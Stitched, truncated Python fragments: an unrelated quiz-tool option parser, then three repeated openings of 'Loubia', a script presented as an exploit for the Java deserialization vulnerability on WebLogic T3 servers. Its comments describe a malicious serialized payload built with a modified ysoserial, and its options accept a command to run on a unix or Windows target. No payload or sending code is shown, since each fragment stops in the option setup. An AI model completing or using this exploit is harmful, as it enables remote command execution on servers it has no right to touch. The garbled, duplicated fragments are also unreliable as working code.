def parse(argv): opts = OptionParser() opts.banner = "Usage: Quizzer [ options ]" opts.add_option("-h", "--help", "Show this message") opts.add_option("-f", "--file",dest="filename",help="-f Quizz.json,Assessment.json", metavar="FILE") opts.add_option("-m", "--file",dest="filename",help="-m Manifest.json", metavar="FILE") opts.add_option("-q", "--quiet",action="store_false", dest="verbose", default=True,help="don't print status messages to stdout") (options, args) = opts.parse_args()
import socket import sys import binascii import time import ssl from optparse import OptionParser parser = OptionParser(usage="usage: %prog hostname port [options]" "", version="%prog 1.0") parser.banner = "Nervous WebLogic Unserialize Vulnerability Exploit\n" parser.add_option("-c", "--cmd", action="store", dest="payload", default="", help="Command to execute") parser.add_option( "-o", "--os", type='choice', choices=['unix', 'win'], action="store", dest="os", default="unix", help="Target operating system (unix/win). Default is unix", ) parser.add_option("-l", "--shell", type="choice", choices=['sh', 'bash'],
# Loubia is a script to exploit the Java Unserialize vulnerability on t3 enabled backends (Weblogic server) # By Nassim Abbaoui ([email protected] / [email protected]) # Based on work presented here http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ # The original payload (malicious java serialized object) was generated using a modified version of ysoserial (https://github.com/frohoff/ysoserial) that allows using pipes/redirections in the command to execute import socket import sys import binascii import time import ssl from optparse import OptionParser parser = OptionParser(usage="usage: %prog hostname port [options]" "", version="%prog 1.0") parser.banner = "Loubia = t3 java unserialize exploitation script\n By Nassim Abbaoui ([email protected] / [email protected])\n" parser.add_option("-c", "--cmd", action="store", dest="payload", default="", help="Command to execute") parser.add_option( "-o", "--os", type='choice', choices=['unix', 'win'], action="store", dest="os", default="unix", help="Target operating system (unix/win). Default is unix",
#!/usr/bin/python # Loubia is a script to exploit the Java Unserialize vulnerability on t3 enabled backends (Weblogic server) # By Nassim Abbaoui ([email protected] / [email protected]) # Based on work presented here http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ # The original payload (malicious java serialized object) was generated using a modified version of ysoserial (https://github.com/frohoff/ysoserial) that allows using pipes/redirections in the command to execute import socket import sys import binascii import time import ssl from optparse import OptionParser parser = OptionParser(usage="usage: %prog hostname port [options]""", version="%prog 1.0") parser.banner = "Loubia = t3 java unserialize exploitation script\n By Nassim Abbaoui ([email protected] / [email protected])\n" parser.add_option("-c", "--cmd", action="store", dest="payload", default="", help="Command to execute") parser.add_option("-o", "--os", type='choice', choices=['unix', 'win'], action="store", dest="os", default="unix", help="Target operating system (unix/win). Default is unix",) parser.add_option("-l", "--shell", type="choice", choices=['sh', 'bash'],